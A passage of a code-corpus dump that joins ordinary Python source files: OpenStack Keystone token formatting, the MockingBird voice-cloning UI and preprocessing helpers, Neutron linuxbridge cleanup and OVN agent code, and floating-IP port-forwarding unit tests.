'openstack_access_token_id': access_token_id,
'openstack_app_cred_id': app_cred_id
}
# NOTE(lbragstad): Calling .items() on a dictionary in python 2 returns
# a list but returns an iterable in python 3. Casting to a list makes
# it safe to modify the dictionary while iterating over it, regardless
# of the python version.
for k, v in list(payload.items()):
if v is None:
payload.pop(k)
token_id = jwt.encode(
payload,
self.private_key,
algorithm=JWSFormatter.algorithm
)
return token_id, issued_at
def validate_token(self, token_id):
payload = self._decode_token_from_id(token_id)
user_id = payload['sub']
expires_at_int = payload['exp']
issued_at_int = payload['iat']
methods = payload['openstack_methods']
audit_ids = payload['openstack_audit_ids']
system = payload.get('openstack_system', None)
domain_id = payload.get('openstack_domain_id', None)
project_id = payload.get('openstack_project_id', None)
trust_id = payload.get('openstack_trust_id', None)
federated_group_ids = payload.get('openstack_group_ids', None)
identity_provider_id = payload.get('openstack_idp_id', None)
protocol_id = payload.get('openstack_protocol_id', None)
access_token_id = payload.get('openstack_access_token_id', None)
app_cred_id = payload.get('openstack_app_cred_id', None)
issued_at = self._convert_time_int_to_string(issued_at_int)
expires_at = self._convert_time_int_to_string(expires_at_int)
return (
user_id, methods, audit_ids, system, domain_id, project_id,
trust_id, federated_group_ids, identity_provider_id, protocol_id,
access_token_id, app_cred_id, issued_at, expires_at
)
def _decode_token_from_id(self, token_id):
options = dict()
options['verify_exp'] = False
for public_key in self.public_keys:
try:
return jwt.decode(
token_id, public_key, algorithms=JWSFormatter.algorithm,
options=options
)
except (jwt.InvalidSignatureError, jwt.DecodeError):
pass # nosec: We want to exhaustively try all public keys
raise exception.TokenNotFound(token_id=token_id)
def _convert_time_string_to_int(self, time_str):
time_object = timeutils.parse_isotime(time_str)
normalized = timeutils.normalize_time(time_object)
epoch = datetime.datetime.utcfromtimestamp(0)
return int((normalized - epoch).total_seconds())
def _convert_time_int_to_string(self, time_int):
time_object = datetime.datetime.utcfromtimestamp(time_int)
return utils.isotime(at=time_object, subsecond=True)
``` |
{
"source": "10088/MockingBird",
"score": 2
} |
#### File: base/api/fastapi_utils.py
```python
import inspect
from typing import Any, Type
from fastapi import FastAPI, Form
from pydantic import BaseModel
def as_form(cls: Type[BaseModel]) -> Any:
"""Adds an as_form class method to decorated models.
The as_form class method can be used with FastAPI endpoints
"""
new_params = [
inspect.Parameter(
field.alias,
inspect.Parameter.POSITIONAL_ONLY,
default=(Form(field.default) if not field.required else Form(...)),
)
for field in cls.__fields__.values()
]
async def _as_form(**data): # type: ignore
return cls(**data)
sig = inspect.signature(_as_form)
sig = sig.replace(parameters=new_params)
_as_form.__signature__ = sig # type: ignore
setattr(cls, "as_form", _as_form)
return cls
def patch_fastapi(app: FastAPI) -> None:
"""Patch function to allow relative url resolution.
This patch is required to make fastapi fully functional with a relative url path.
This code snippet can be copy-pasted to any Fastapi application.
"""
from fastapi.openapi.docs import get_redoc_html, get_swagger_ui_html
from starlette.requests import Request
from starlette.responses import HTMLResponse
async def redoc_ui_html(req: Request) -> HTMLResponse:
assert app.openapi_url is not None
redoc_ui = get_redoc_html(
openapi_url="./" + app.openapi_url.lstrip("/"),
title=app.title + " - Redoc UI",
)
return HTMLResponse(redoc_ui.body.decode("utf-8"))
async def swagger_ui_html(req: Request) -> HTMLResponse:
assert app.openapi_url is not None
swagger_ui = get_swagger_ui_html(
openapi_url="./" + app.openapi_url.lstrip("/"),
title=app.title + " - Swagger UI",
oauth2_redirect_url=app.swagger_ui_oauth2_redirect_url,
)
# insert request interceptor to have all request run on relativ path
request_interceptor = (
"requestInterceptor: (e) => {"
"\n\t\t\tvar url = window.location.origin + window.location.pathname"
'\n\t\t\turl = url.substring( 0, url.lastIndexOf( "/" ) + 1);'
"\n\t\t\turl = e.url.replace(/http(s)?:\/\/[^/]*\//i, url);" # noqa: W605
"\n\t\t\te.contextUrl = url"
"\n\t\t\te.url = url"
"\n\t\t\treturn e;}"
)
return HTMLResponse(
swagger_ui.body.decode("utf-8").replace(
"dom_id: '#swagger-ui',",
"dom_id: '#swagger-ui',\n\t\t" + request_interceptor + ",",
)
)
# remove old docs route and add our patched route
routes_new = []
for app_route in app.routes:
if app_route.path == "/docs": # type: ignore
continue
if app_route.path == "/redoc": # type: ignore
continue
routes_new.append(app_route)
app.router.routes = routes_new
assert app.docs_url is not None
app.add_route(app.docs_url, swagger_ui_html, include_in_schema=False)
assert app.redoc_url is not None
app.add_route(app.redoc_url, redoc_ui_html, include_in_schema=False)
# Make graphql realtive
from starlette import graphql
graphql.GRAPHIQL = graphql.GRAPHIQL.replace(
"({{REQUEST_PATH}}", '("." + {{REQUEST_PATH}}'
)
```
#### File: mkgui/base/core.py
```python
import importlib
import inspect
import re
from typing import Any, Callable, Type, Union, get_type_hints
from pydantic import BaseModel, parse_raw_as
from pydantic.tools import parse_obj_as
def name_to_title(name: str) -> str:
"""Converts a camelCase or snake_case name to title case."""
# If camelCase -> convert to snake case
name = re.sub("(.)([A-Z][a-z]+)", r"\1_\2", name)
name = re.sub("([a-z0-9])([A-Z])", r"\1_\2", name).lower()
# Convert to title case
return name.replace("_", " ").strip().title()
def is_compatible_type(type: Type) -> bool:
"""Returns `True` if the type is opyrator-compatible."""
try:
if issubclass(type, BaseModel):
return True
except Exception:
pass
try:
# valid list type
if type.__origin__ is list and issubclass(type.__args__[0], BaseModel):
return True
except Exception:
pass
return False
def get_input_type(func: Callable) -> Type:
"""Returns the input type of a given function (callable).
Args:
func: The function for which to get the input type.
Raises:
ValueError: If the function does not have a valid input type annotation.
"""
type_hints = get_type_hints(func)
if "input" not in type_hints:
raise ValueError(
"The callable MUST have a parameter with the name `input` with typing annotation. "
"For example: `def my_opyrator(input: InputModel) -> OutputModel:`."
)
input_type = type_hints["input"]
if not is_compatible_type(input_type):
raise ValueError(
"The `input` parameter MUST be a subclass of the Pydantic BaseModel or a list of Pydantic models."
)
# TODO: return warning if more than one input parameters
return input_type
def get_output_type(func: Callable) -> Type:
"""Returns the output type of a given function (callable).
Args:
func: The function for which to get the output type.
Raises:
ValueError: If the function does not have a valid output type annotation.
"""
type_hints = get_type_hints(func)
if "return" not in type_hints:
raise ValueError(
"The return type of the callable MUST be annotated with type hints."
"For example: `def my_opyrator(input: InputModel) -> OutputModel:`."
)
output_type = type_hints["return"]
if not is_compatible_type(output_type):
raise ValueError(
"The return value MUST be a subclass of the Pydantic BaseModel or a list of Pydantic models."
)
return output_type
def get_callable(import_string: str) -> Callable:
"""Import a callable from an string."""
callable_seperator = ":"
if callable_seperator not in import_string:
# Use dot as seperator
callable_seperator = "."
if callable_seperator not in import_string:
raise ValueError("The callable path MUST specify the function. ")
mod_name, callable_name = import_string.rsplit(callable_seperator, 1)
mod = importlib.import_module(mod_name)
return getattr(mod, callable_name)
class Opyrator:
def __init__(self, func: Union[Callable, str]) -> None:
if isinstance(func, str):
# Try to load the function from a string notion
self.function = get_callable(func)
else:
self.function = func
self._action = "Execute"
self._input_type = None
self._output_type = None
if not callable(self.function):
raise ValueError("The provided function parameters is not a callable.")
if inspect.isclass(self.function):
raise ValueError(
"The provided callable is an uninitialized Class. This is not allowed."
)
if inspect.isfunction(self.function):
# The provided callable is a function
self._input_type = get_input_type(self.function)
self._output_type = get_output_type(self.function)
try:
# Get name
self._name = name_to_title(self.function.__name__)
except Exception:
pass
try:
# Get description from function
doc_string = inspect.getdoc(self.function)
if doc_string:
self._action = doc_string
except Exception:
pass
elif hasattr(self.function, "__call__"):
# The provided callable is a function
self._input_type = get_input_type(self.function.__call__) # type: ignore
self._output_type = get_output_type(self.function.__call__) # type: ignore
try:
# Get name
self._name = name_to_title(type(self.function).__name__)
except Exception:
pass
try:
# Get action from
doc_string = inspect.getdoc(self.function.__call__) # type: ignore
if doc_string:
self._action = doc_string
if (
not self._action
or self._action == "Call"
):
# Get docstring from class instead of __call__ function
doc_string = inspect.getdoc(self.function)
if doc_string:
self._action = doc_string
except Exception:
pass
else:
raise ValueError("Unknown callable type.")
@property
def name(self) -> str:
return self._name
@property
def action(self) -> str:
return self._action
@property
def input_type(self) -> Any:
return self._input_type
@property
def output_type(self) -> Any:
return self._output_type
def __call__(self, input: Any, **kwargs: Any) -> Any:
input_obj = input
if isinstance(input, str):
# Allow json input
input_obj = parse_raw_as(self.input_type, input)
if isinstance(input, dict):
# Allow dict input
input_obj = parse_obj_as(self.input_type, input)
return self.function(input_obj, **kwargs)
```
#### File: MockingBird/mkgui/preprocess.py
```python
from pydantic import BaseModel, Field
import os
from pathlib import Path
from enum import Enum
from typing import Any
# Constants
EXT_MODELS_DIRT = "ppg_extractor\\saved_models"
ENC_MODELS_DIRT = "encoder\\saved_models"
if os.path.isdir(EXT_MODELS_DIRT):
extractors = Enum('extractors', list((file.name, file) for file in Path(EXT_MODELS_DIRT).glob("**/*.pt")))
print("Loaded extractor models: " + str(len(extractors)))
else:
raise Exception(f"Model folder {EXT_MODELS_DIRT} doesn't exist.")
if os.path.isdir(ENC_MODELS_DIRT):
encoders = Enum('encoders', list((file.name, file) for file in Path(ENC_MODELS_DIRT).glob("**/*.pt")))
print("Loaded encoders models: " + str(len(encoders)))
else:
raise Exception(f"Model folder {ENC_MODELS_DIRT} doesn't exist.")
class Model(str, Enum):
VC_PPG2MEL = "ppg2mel"
class Dataset(str, Enum):
AIDATATANG_200ZH = "aidatatang_200zh"
AIDATATANG_200ZH_S = "aidatatang_200zh_s"
class Input(BaseModel):
# def render_input_ui(st, input) -> Dict:
# input["selected_dataset"] = st.selectbox(
# '选择数据集',
# ("aidatatang_200zh", "aidatatang_200zh_s")
# )
# return input
model: Model = Field(
Model.VC_PPG2MEL, title="目标模型",
)
dataset: Dataset = Field(
Dataset.AIDATATANG_200ZH, title="数据集选择",
)
datasets_root: str = Field(
..., alias="数据集根目录", description="输入数据集根目录(相对/绝对)",
format=True,
example="..\\trainning_data\\"
)
output_root: str = Field(
..., alias="输出根目录", description="输出结果根目录(相对/绝对)",
format=True,
example="..\\trainning_data\\"
)
n_processes: int = Field(
2, alias="处理线程数", description="根据CPU线程数来设置",
le=32, ge=1
)
extractor: extractors = Field(
..., alias="特征提取模型",
description="选择PPG特征提取模型文件."
)
encoder: encoders = Field(
..., alias="语音编码模型",
description="选择语音编码模型文件."
)
class AudioEntity(BaseModel):
content: bytes
mel: Any
class Output(BaseModel):
__root__: tuple[str, int]
def render_output_ui(self, streamlit_app, input) -> None: # type: ignore
"""Custom output UI.
If this method is implmeneted, it will be used instead of the default Output UI renderer.
"""
sr, count = self.__root__
streamlit_app.subheader(f"Dataset {sr} done processed total of {count}")
def preprocess(input: Input) -> Output:
"""Preprocess(预处理)"""
finished = 0
if input.model == Model.VC_PPG2MEL:
from ppg2mel.preprocess import preprocess_dataset
finished = preprocess_dataset(
datasets_root=Path(input.datasets_root),
dataset=input.dataset,
out_dir=Path(input.output_root),
n_processes=input.n_processes,
ppg_encoder_model_fpath=Path(input.extractor.value),
speaker_encoder_model=Path(input.encoder.value)
)
# TODO: pass useful return code
return Output(__root__=(input.dataset, finished))
```
#### File: vocoder/fregan/dwt.py
```python
import pywt
import torch
import torch.nn as nn
import torch.nn.functional as F
__all__ = ['DWT_1D']
Pad_Mode = ['constant', 'reflect', 'replicate', 'circular']
class DWT_1D(nn.Module):
def __init__(self, pad_type='reflect', wavename='haar',
stride=2, in_channels=1, out_channels=None, groups=None,
kernel_size=None, trainable=False):
super(DWT_1D, self).__init__()
self.trainable = trainable
self.kernel_size = kernel_size
if not self.trainable:
assert self.kernel_size == None
self.in_channels = in_channels
self.out_channels = self.in_channels if out_channels == None else out_channels
self.groups = self.in_channels if groups == None else groups
assert isinstance(self.groups, int) and self.in_channels % self.groups == 0
self.stride = stride
assert self.stride == 2
self.wavename = wavename
self.pad_type = pad_type
assert self.pad_type in Pad_Mode
self.get_filters()
self.initialization()
def get_filters(self):
wavelet = pywt.Wavelet(self.wavename)
band_low = torch.tensor(wavelet.rec_lo)
band_high = torch.tensor(wavelet.rec_hi)
length_band = band_low.size()[0]
self.kernel_size = length_band if self.kernel_size == None else self.kernel_size
assert self.kernel_size >= length_band
a = (self.kernel_size - length_band) // 2
b = - (self.kernel_size - length_band - a)
b = None if b == 0 else b
self.filt_low = torch.zeros(self.kernel_size)
self.filt_high = torch.zeros(self.kernel_size)
self.filt_low[a:b] = band_low
self.filt_high[a:b] = band_high
def initialization(self):
self.filter_low = self.filt_low[None, None, :].repeat((self.out_channels, self.in_channels // self.groups, 1))
self.filter_high = self.filt_high[None, None, :].repeat((self.out_channels, self.in_channels // self.groups, 1))
if torch.cuda.is_available():
self.filter_low = self.filter_low.cuda()
self.filter_high = self.filter_high.cuda()
if self.trainable:
self.filter_low = nn.Parameter(self.filter_low)
self.filter_high = nn.Parameter(self.filter_high)
if self.kernel_size % 2 == 0:
self.pad_sizes = [self.kernel_size // 2 - 1, self.kernel_size // 2 - 1]
else:
self.pad_sizes = [self.kernel_size // 2, self.kernel_size // 2]
def forward(self, input):
assert isinstance(input, torch.Tensor)
assert len(input.size()) == 3
assert input.size()[1] == self.in_channels
input = F.pad(input, pad=self.pad_sizes, mode=self.pad_type)
return F.conv1d(input, self.filter_low.to(input.device), stride=self.stride, groups=self.groups), \
F.conv1d(input, self.filter_high.to(input.device), stride=self.stride, groups=self.groups)
```
#### File: vocoder/hifigan/env.py
```python
import os
import shutil
def build_env(config, config_name, path):
t_path = os.path.join(path, config_name)
if config != t_path:
os.makedirs(path, exist_ok=True)
shutil.copyfile(config, os.path.join(path, config_name))
```
#### File: 10088/MockingBird/web.py
```python
import os
import sys
import typer
cli = typer.Typer()
@cli.command()
def launch_ui(port: int = typer.Option(8080, "--port", "-p")) -> None:
"""Start a graphical UI server for the opyrator.
The UI is auto-generated from the input- and output-schema of the given function.
"""
# Add the current working directory to the sys path
# This is required to resolve the opyrator path
sys.path.append(os.getcwd())
from mkgui.base.ui.streamlit_ui import launch_ui
launch_ui(port)
if __name__ == "__main__":
cli()
``` |
{
"source": "10088/neutron",
"score": 2
} |
#### File: neutron/cmd/linuxbridge_cleanup.py
```python
import sys
from neutron_lib.utils import helpers
from oslo_config import cfg
from oslo_log import log as logging
from neutron.common import config as common_config
from neutron.conf.agent import common as config
from neutron.plugins.ml2.drivers.linuxbridge.agent \
import linuxbridge_neutron_agent
LOG = logging.getLogger(__name__)
def remove_empty_bridges():
try:
interface_mappings = helpers.parse_mappings(
cfg.CONF.LINUX_BRIDGE.physical_interface_mappings)
except ValueError as e:
LOG.error("Parsing physical_interface_mappings failed: %s.", e)
sys.exit(1)
LOG.info("Interface mappings: %s.", interface_mappings)
try:
bridge_mappings = helpers.parse_mappings(
cfg.CONF.LINUX_BRIDGE.bridge_mappings)
except ValueError as e:
LOG.error("Parsing bridge_mappings failed: %s.", e)
sys.exit(1)
LOG.info("Bridge mappings: %s.", bridge_mappings)
lb_manager = linuxbridge_neutron_agent.LinuxBridgeManager(
bridge_mappings, interface_mappings)
bridge_names = lb_manager.get_deletable_bridges()
for bridge_name in bridge_names:
if lb_manager.get_tap_devices_count(bridge_name):
continue
try:
lb_manager.delete_bridge(bridge_name)
LOG.info("Linux bridge %s deleted", bridge_name)
except RuntimeError:
LOG.exception("Linux bridge %s delete failed", bridge_name)
LOG.info("Linux bridge cleanup completed successfully")
def main():
"""Main method for cleaning up empty linux bridges.
This tool deletes every empty linux bridge managed by linuxbridge agent
(brq.* linux bridges) except thes ones defined using bridge_mappings option
in section LINUX_BRIDGE (created by deployers).
This tool should not be called during an instance create, migrate, etc. as
it can delete a linux bridge about to be used by nova.
"""
common_config.register_common_config_options()
cfg.CONF(sys.argv[1:])
config.setup_logging()
config.setup_privsep()
remove_empty_bridges()
```
#### File: ovn/agent/neutron_agent.py
```python
import abc
import copy
import datetime
from oslo_config import cfg
from oslo_utils import timeutils
from neutron._i18n import _
from neutron.common.ovn import constants as ovn_const
from neutron.common.ovn import utils as ovn_utils
from neutron.common import utils
class DeletedChassis(object):
external_ids = {}
hostname = '("Chassis" register deleted)'
name = '("Chassis" register deleted)'
class NeutronAgent(abc.ABC):
types = {}
def __init_subclass__(cls):
# Register the subclasses to be looked up by their type
NeutronAgent.types[cls.agent_type] = cls
def __init__(self, chassis_private, driver, updated_at=None):
self.driver = driver
self.set_down = False
self.update(chassis_private, updated_at)
def update(self, chassis_private, updated_at=None, clear_down=False):
self.chassis_private = chassis_private
if not updated_at:
# When use the Chassis_Private table for agents health check,
# chassis_private has attribute nb_cfg_timestamp.
# nb_cfg_timestamp: the timestamp when ovn-controller finishes
# processing the change corresponding to nb_cfg(
# https://www.ovn.org/support/dist-docs/ovn-sb.5.html).
# it can better reflect the status of chassis.
# nb_cfg_timestamp is milliseconds, need to convert to datetime.
if hasattr(chassis_private, 'nb_cfg_timestamp'):
updated_at = datetime.datetime.fromtimestamp(
chassis_private.nb_cfg_timestamp / 1000,
datetime.timezone.utc)
else:
updated_at = timeutils.utcnow(with_timezone=True)
self.updated_at = updated_at
if clear_down:
self.set_down = False
@staticmethod
def chassis_from_private(chassis_private):
try:
return chassis_private.chassis[0]
except AttributeError:
# No Chassis_Private support, just use Chassis
return chassis_private
except IndexError:
# Chassis register has been deleted but not Chassis_Private.
return DeletedChassis
@property
def chassis(self):
return self.chassis_from_private(self.chassis_private)
def as_dict(self):
return {
'binary': self.binary,
'host': self.chassis.hostname,
'heartbeat_timestamp': timeutils.utcnow(),
'availability_zone': ', '.join(
ovn_utils.get_chassis_availability_zones(self.chassis)),
'topic': 'n/a',
'description': self.description,
'configurations': {
'chassis_name': self.chassis.name,
'bridge-mappings':
self.chassis.external_ids.get('ovn-bridge-mappings', '')},
'start_flag': True,
'agent_type': self.agent_type,
'id': self.agent_id,
'alive': self.alive,
'admin_state_up': True}
@property
def alive(self):
if self.set_down:
return False
# TODO(twilson) Determine if we can go back to just checking:
# if self.driver.nb_ovn.nb_global.nb_cfg == self.nb_cfg:
if self.driver.nb_ovn.nb_global.nb_cfg - self.nb_cfg <= 1:
return True
now = timeutils.utcnow(with_timezone=True)
if (now - self.updated_at).total_seconds() < cfg.CONF.agent_down_time:
# down, but not yet timed out
return True
return False
@classmethod
def from_type(cls, _type, chassis_private, driver, updated_at=None):
return cls.types[_type](chassis_private, driver, updated_at)
@property
@abc.abstractmethod
def agent_type(self):
pass
@property
@abc.abstractmethod
def binary(self):
pass
@property
@abc.abstractmethod
def nb_cfg(self):
pass
@property
@abc.abstractmethod
def agent_id(self):
pass
class ControllerAgent(NeutronAgent):
agent_type = ovn_const.OVN_CONTROLLER_AGENT
binary = 'ovn-controller'
@staticmethod # it is by default, but this makes pep8 happy
def __new__(cls, chassis_private, driver, updated_at=None):
external_ids = cls.chassis_from_private(chassis_private).external_ids
if ('enable-chassis-as-gw' in
external_ids.get('ovn-cms-options', [])):
cls = ControllerGatewayAgent
return super().__new__(cls)
@staticmethod
def id_from_chassis_private(chassis_private):
return chassis_private.name
@property
def nb_cfg(self):
return self.chassis_private.nb_cfg
@property
def agent_id(self):
return self.id_from_chassis_private(self.chassis_private)
@property
def description(self):
return self.chassis_private.external_ids.get(
ovn_const.OVN_AGENT_DESC_KEY, '')
def update(self, chassis_private, updated_at=None, clear_down=False):
super().update(chassis_private, updated_at, clear_down)
external_ids = self.chassis_from_private(chassis_private).external_ids
if 'enable-chassis-as-gw' in external_ids.get('ovn-cms-options', []):
self.__class__ = ControllerGatewayAgent
class ControllerGatewayAgent(ControllerAgent):
agent_type = ovn_const.OVN_CONTROLLER_GW_AGENT
def update(self, chassis_private, updated_at=None, clear_down=False):
super().update(chassis_private, updated_at, clear_down)
external_ids = self.chassis_from_private(chassis_private).external_ids
if ('enable-chassis-as-gw' not in
external_ids.get('ovn-cms-options', [])):
self.__class__ = ControllerAgent
class MetadataAgent(NeutronAgent):
agent_type = ovn_const.OVN_METADATA_AGENT
binary = 'neutron-ovn-metadata-agent'
@property
def alive(self):
# If ovn-controller is down, then metadata agent is down even
# if the metadata-agent binary is updating external_ids.
try:
if not AgentCache()[self.chassis_private.name].alive:
return False
except KeyError:
return False
return super().alive
@property
def nb_cfg(self):
return int(self.chassis_private.external_ids.get(
ovn_const.OVN_AGENT_METADATA_SB_CFG_KEY, 0))
@staticmethod
def id_from_chassis_private(chassis_private):
return chassis_private.external_ids.get(
ovn_const.OVN_AGENT_METADATA_ID_KEY)
@property
def agent_id(self):
return self.id_from_chassis_private(self.chassis_private)
@property
def description(self):
return self.chassis_private.external_ids.get(
ovn_const.OVN_AGENT_METADATA_DESC_KEY, '')
@utils.SingletonDecorator
class AgentCache:
def __init__(self, driver=None):
# This is just to make pylint happy because it doesn't like calls to
# AgentCache() with no arguments, despite init only being called the
# first time--and we do really want a driver passed in.
if driver is None:
raise ValueError(_("driver cannot be None"))
self.agents = {}
self.driver = driver
def __iter__(self):
# Copying self.agents will avoid any issue during the iteration if an
# agent is added or deleted.
_agents = copy.copy(self.agents)
return iter(_agents.values())
def __getitem__(self, key):
return self.agents[key]
def update(self, agent_type, row, updated_at=None, clear_down=False):
cls = NeutronAgent.types[agent_type]
try:
agent = self.agents[cls.id_from_chassis_private(row)]
agent.update(row, updated_at=updated_at, clear_down=clear_down)
except KeyError:
agent = NeutronAgent.from_type(agent_type, row, self.driver,
updated_at=updated_at)
self.agents[agent.agent_id] = agent
return agent
def __delitem__(self, agent_id):
del self.agents[agent_id]
def agents_by_chassis_private(self, chassis_private):
# Get unique agent ids based on the chassis_private
agent_ids = {cls.id_from_chassis_private(chassis_private)
for cls in NeutronAgent.types.values()}
# Return the cached agents of agent_ids whose keys are in the cache
return (agent for agent in self if agent.agent_id in agent_ids)
def get_agents(self, filters=None):
filters = filters or {}
agent_list = []
for agent in self:
agent_dict = agent.as_dict()
if all(agent_dict[k] in v for k, v in filters.items()):
agent_list.append(agent)
return agent_list
```
#### File: unit/extensions/test_floating_ip_port_forwarding.py
```python
from unittest import mock
from neutron_lib import context
from oslo_utils import uuidutils
from webob import exc
from neutron.tests.unit.api import test_extensions
from neutron.tests.unit.extensions import \
test_expose_port_forwarding_in_fip as test_fip_pf
from neutron.tests.unit.extensions import test_l3
_uuid = uuidutils.generate_uuid
class FloatingIPPorForwardingTestCase(test_l3.L3BaseForIntTests,
test_l3.L3NatTestCaseMixin):
fmt = 'json'
def setUp(self):
mock.patch('neutron.api.rpc.handlers.resources_rpc.'
'ResourcesPushRpcApi').start()
svc_plugins = (test_fip_pf.PF_PLUGIN_NAME, test_fip_pf.L3_PLUGIN,
'neutron.services.qos.qos_plugin.QoSPlugin')
ext_mgr = test_fip_pf.ExtendFipPortForwardingExtensionManager()
super(FloatingIPPorForwardingTestCase, self).setUp(
ext_mgr=ext_mgr, service_plugins=svc_plugins)
self.ext_api = test_extensions.setup_extensions_middleware(ext_mgr)
def _create_fip_port_forwarding(self, fmt,
floating_ip_id,
external_port,
internal_port,
protocol,
internal_ip_address,
internal_port_id,
tenant_id=None,
description=None,
external_port_range=None,
internal_port_range=None):
tenant_id = tenant_id or _uuid()
data = {'port_forwarding': {
"protocol": protocol,
"internal_ip_address": internal_ip_address,
"internal_port_id": internal_port_id}
}
if external_port_range and internal_port_range:
data['port_forwarding'][
'internal_port_range'] = internal_port_range
data['port_forwarding'][
'external_port_range'] = external_port_range
else:
data['port_forwarding']['internal_port'] = internal_port
data['port_forwarding']['external_port'] = external_port
if description:
data['port_forwarding']['description'] = description
fip_pf_req = self._req(
'POST', 'floatingips', data,
fmt or self.fmt, id=floating_ip_id,
subresource='port_forwardings')
fip_pf_req.environ['neutron.context'] = context.Context(
'', tenant_id, is_admin=True)
return fip_pf_req.get_response(self.ext_api)
def _update_fip_port_forwarding(self, fmt, floating_ip_id,
port_forwarding_id, **kwargs):
port_forwarding = {}
for k, v in kwargs.items():
port_forwarding[k] = v
data = {'port_forwarding': port_forwarding}
fip_pf_req = self._req(
'PUT', 'floatingips', data,
fmt or self.fmt, id=floating_ip_id,
sub_id=port_forwarding_id,
subresource='port_forwardings')
return fip_pf_req.get_response(self.ext_api)
def test_create_floatingip_port_forwarding_with_port_number_0(self):
with self.network() as ext_net:
network_id = ext_net['network']['id']
self._set_net_external(network_id)
with self.subnet(ext_net, cidr='10.10.10.0/24'), \
self.router() as router, \
self.subnet(cidr='11.0.0.0/24') as private_subnet, \
self.port(private_subnet) as port:
self._add_external_gateway_to_router(
router['router']['id'],
network_id)
self._router_interface_action(
'add', router['router']['id'],
private_subnet['subnet']['id'],
None)
fip = self._make_floatingip(
self.fmt,
network_id)
self.assertIsNone(fip['floatingip'].get('port_id'))
res = self._create_fip_port_forwarding(
self.fmt, fip['floatingip']['id'],
2222, 0,
'tcp',
port['port']['fixed_ips'][0]['ip_address'],
port['port']['id'])
self.assertEqual(exc.HTTPBadRequest.code, res.status_int)
res = self._create_fip_port_forwarding(
self.fmt, fip['floatingip']['id'],
0, 22,
'tcp',
port['port']['fixed_ips'][0]['ip_address'],
port['port']['id'])
self.assertEqual(exc.HTTPBadRequest.code, res.status_int)
def test_create_floatingip_port_forwarding_with_description(self):
with self.network() as ext_net:
network_id = ext_net['network']['id']
self._set_net_external(network_id)
with self.subnet(ext_net, cidr='10.10.10.0/24'), \
self.router() as router, \
self.subnet(cidr='172.16.17.32/24') as private_subnet, \
self.port(private_subnet) as port:
self._add_external_gateway_to_router(
router['router']['id'],
network_id)
self._router_interface_action(
'add', router['router']['id'],
private_subnet['subnet']['id'],
None)
fip = self._make_floatingip(
self.fmt,
network_id)
self.assertIsNone(fip['floatingip'].get('port_id'))
res = self._create_fip_port_forwarding(
self.fmt, fip['floatingip']['id'],
2222, 22,
'tcp',
port['port']['fixed_ips'][0]['ip_address'],
port['port']['id'],
description="blablablabla")
self.assertEqual(exc.HTTPCreated.code, res.status_int)
pf_body = self.deserialize(self.fmt, res)
self.assertEqual(
"blablablabla", pf_body['port_forwarding']['description'])
def test_create_floatingip_port_forwarding_with_ranges(self):
internal_port_range = '22:24'
external_port_range = '2222:2224'
with self.network() as ext_net:
network_id = ext_net['network']['id']
self._set_net_external(network_id)
with self.subnet(ext_net, cidr='10.10.10.0/24'), \
self.router() as router, \
self.subnet(cidr='172.16.17.32/24') as private_subnet, \
self.port(private_subnet) as port:
self._add_external_gateway_to_router(
router['router']['id'],
network_id)
self._router_interface_action(
'add', router['router']['id'],
private_subnet['subnet']['id'],
None)
fip = self._make_floatingip(
self.fmt,
network_id)
self.assertIsNone(fip['floatingip'].get('port_id'))
res = self._create_fip_port_forwarding(
self.fmt, fip['floatingip']['id'],
None, None,
'tcp',
port['port']['fixed_ips'][0]['ip_address'],
port['port']['id'],
internal_port_range=internal_port_range,
external_port_range=external_port_range)
self.assertEqual(exc.HTTPCreated.code, res.status_int)
pf_body = self.deserialize(self.fmt, res)
self.assertEqual(
internal_port_range,
pf_body['port_forwarding']['internal_port_range'])
self.assertEqual(
external_port_range,
pf_body['port_forwarding']['external_port_range'])
def test_create_floatingip_port_forwarding_with_ranges_port_collisions(
self):
internal_port_range1 = '22:24'
internal_port_range2 = '23:25'
external_port_range1 = '2222:2224'
external_port_range2 = '2223:2225'
with self.network() as ext_net:
network_id = ext_net['network']['id']
self._set_net_external(network_id)
with self.subnet(ext_net, cidr='10.10.10.0/24'), \
self.router() as router, \
self.subnet(cidr='172.16.17.32/24') as private_subnet, \
self.port(private_subnet) as port:
self._add_external_gateway_to_router(
router['router']['id'],
network_id)
self._router_interface_action(
'add', router['router']['id'],
private_subnet['subnet']['id'],
None)
fip = self._make_floatingip(
self.fmt,
network_id)
self.assertIsNone(fip['floatingip'].get('port_id'))
self._create_fip_port_forwarding(
self.fmt, fip['floatingip']['id'],
None, None,
'tcp',
port['port']['fixed_ips'][0]['ip_address'],
port['port']['id'],
internal_port_range=internal_port_range1,
external_port_range=external_port_range1)
response = self._create_fip_port_forwarding(
self.fmt, fip['floatingip']['id'],
None, None,
'tcp',
port['port']['fixed_ips'][0]['ip_address'],
port['port']['id'],
internal_port_range=internal_port_range2,
external_port_range=external_port_range2)
self.assertEqual(exc.HTTPBadRequest.code,
response.status_int)
def test_update_floatingip_port_forwarding_with_dup_internal_port(self):
with self.network() as ext_net:
network_id = ext_net['network']['id']
self._set_net_external(network_id)
with self.subnet(ext_net, cidr='10.10.10.0/24'), \
self.router() as router, \
self.subnet(cidr='172.16.17.32/24') as private_subnet, \
self.port(private_subnet) as port:
self._add_external_gateway_to_router(
router['router']['id'],
network_id)
self._router_interface_action(
'add', router['router']['id'],
private_subnet['subnet']['id'],
None)
fip1 = self._make_floatingip(
self.fmt,
network_id)
self.assertIsNone(fip1['floatingip'].get('port_id'))
self._create_fip_port_forwarding(
self.fmt, fip1['floatingip']['id'],
2222, 22,
'tcp',
port['port']['fixed_ips'][0]['ip_address'],
port['port']['id'],
description="blablablabla")
fip2 = self._make_floatingip(
self.fmt,
network_id)
fip_pf_response = self._create_fip_port_forwarding(
self.fmt, fip2['floatingip']['id'],
2222, 23,
'tcp',
port['port']['fixed_ips'][0]['ip_address'],
port['port']['id'],
description="blablablabla")
update_res = self._update_fip_port_forwarding(
self.fmt, fip2['floatingip']['id'],
fip_pf_response.json['port_forwarding']['id'],
**{'internal_port': 22})
self.assertEqual(exc.HTTPBadRequest.code,
update_res.status_int)
```
#### File: drivers/ovn/test_driver.py
```python
from unittest import mock
from neutron_lib.plugins import constants as plugin_constants
from neutron_lib.services.logapi import constants as log_const
from oslo_utils import uuidutils
from ovsdbapp.backend.ovs_idl import idlutils
from neutron.common import utils as neutron_utils
from neutron.common.ovn import constants as ovn_const
from neutron.common.ovn import utils as ovn_utils
from neutron.services.logapi.drivers.ovn import driver as ovn_driver
from neutron.tests import base
from neutron.tests.unit import fake_resources
FAKE_CFG_RATE = 123
FAKE_CFG_BURST = 321
class TestOVNDriver(base.BaseTestCase):
def setUp(self):
super().setUp()
